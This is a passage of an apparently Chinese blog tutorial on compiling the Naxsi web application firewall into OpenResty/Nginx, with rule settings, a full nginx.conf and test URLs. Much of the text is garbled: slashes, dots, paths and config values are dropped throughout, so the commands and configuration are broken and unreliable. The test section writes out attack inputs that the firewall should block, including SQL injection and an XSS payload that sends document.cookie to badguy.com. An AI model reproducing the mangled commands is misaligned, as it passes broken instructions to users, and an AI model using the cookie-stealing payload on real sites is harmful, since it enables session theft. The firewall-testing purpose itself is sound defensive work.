二、下载Naxsi

cd /data0software
wget https://github.com/nbs-system/naxsi/archive/master.zip
mv master naxsi-master.zip
unzip naxsizip

三、重新编译Nginx，加入naxsi模块

cd ngx_openresty-1.4.3.6
./configure --user=www --groupprefix=/usr/localopenresty withluajit http_stub_status_module http_ssl_module http_sub_module http_realip_module add-module/data0/naxsinaxsi_src
gmake
gmake install
cd ../

四、拷贝Naxsi的核心配置规则库

cp naxsi_confignaxsi_corerules usr/webserverNginxconf/

定义一个虚拟主机的安全规则

vi mysiterules

内容如下：

#LearningMode; #Enables learning mode
SecRulesEnabled;
#SecRulesDisabled;DeniedUrl "/RequestDenied"## check rulesCheckRule"$sql >= 8" BLOCK"$RFI >= 8""$TRAVERSAL >= 4""$EVADE >= 4""$XSS >= 8";

编辑Nginx.conf

conf

在http部分加入如下配置

include       rules;

完整的Nginx.conf如下

user  www www

worker_processes 8

error_log  data1logsNginx_errorlog  crit

pid        pid

#Specifies the value for maximum file descriptors that can be opened by this process.
worker_rlimit_nofile 65535

events
{
  use epoll
  worker_connections }

http

  include       mimetypes
  include       
  default_type  applicationoctetstream

  #charset  gb2312;
      
  server_names_hash_bucket_size 128
  client_header_buffer_size 32k
  large_client_header_buffers 4 
  client_max_body_size 8m
      
  sendfile on
  tcp_nopush     on

  keepalive_timeout 60

  tcp_nodelay on
  server_tokens off

  fastcgi_connect_timeout 300
  fastcgi_send_timeout 
  fastcgi_read_timeout 
  fastcgi_buffer_size 64k
  fastcgi_buffers 
  fastcgi_busy_buffers_size 128k
  fastcgi_temp_file_write_size 

  gzip on
  gzip_min_length  1k
  gzip_buffers     16k
  gzip_http_version 1.0
  gzip_comp_level 2
  gzip_types       textplain applicationxjavascript textcss applicationxml
  gzip_vary on#limit_zone  crawler  $binary_remote_addr  10m;
  log_format  access  '$remote_addr - $remote_user [$time_local] "$request" '
               '$status $body_bytes_sent $upstream_response_time $request_time "$http_referer" ''"$http_user_agent" $http_x_forwarded_for "$server_name" "$http_host"'

  log_format  wwwlogs  
              

  server
  
    listen       80
    server_name  blogabccom
    index indexhtml indexhtm indexPHP
    root  htdocsblog

    #limit_conn   crawler  20;    
                            
    location ~ .*\.(|PHP5)?$
          
      #fastcgi_pass  unix:/tmp/php-cgi.sock;
      fastcgi_pass  127.00.1:9000
      fastcgi_index index
      include fcgi
    
    
    location gifjpgjpegpngbmpswf)
      expires      30d

    location jscss1h    

    access_log  accesslog  access
  

  server
  
    server_name  wwwwww
        include    
        proxy_pass http//127.0.0.1/;
        proxy_set_header Host www    
    /RequestDenied
        return403
    access_log  log  wwwlogs
    error_log  mysite_Nginx_errorlog debug

    access_log  wwwlogs
    listen  
    server_name  status
    stub_status on
    access_log   off}

五、启动Nginx

killall 9 Nginx
sbinNginx

六、测试

http//www.abc.com/test.PHP?name=40/**/and/**/1=1  不通过，含有条件注入
http//www.abc.com/test.PHP?name=%28%29            不通过，特殊字符//www.abc.com/test.PHP?term=%3Cscript%3Ewindow.open%28%22http://badguy.com?cookie=%22+document.cookie%29%3C/script%3E                                                   不通过，参数内容含脚本注入//www.abc.com/test.PHP?title=Meta%20http-equiv=%22refresh%22%20content=%220;%22 不通过

可以到/data1/logs/mysite_Nginx_error.log查看naxsi过滤的请求

除非注明，本博客文章均为原创，转载请以链接形式标明本文地址 本文地址： http://blog.cnwyhx.com/?p=301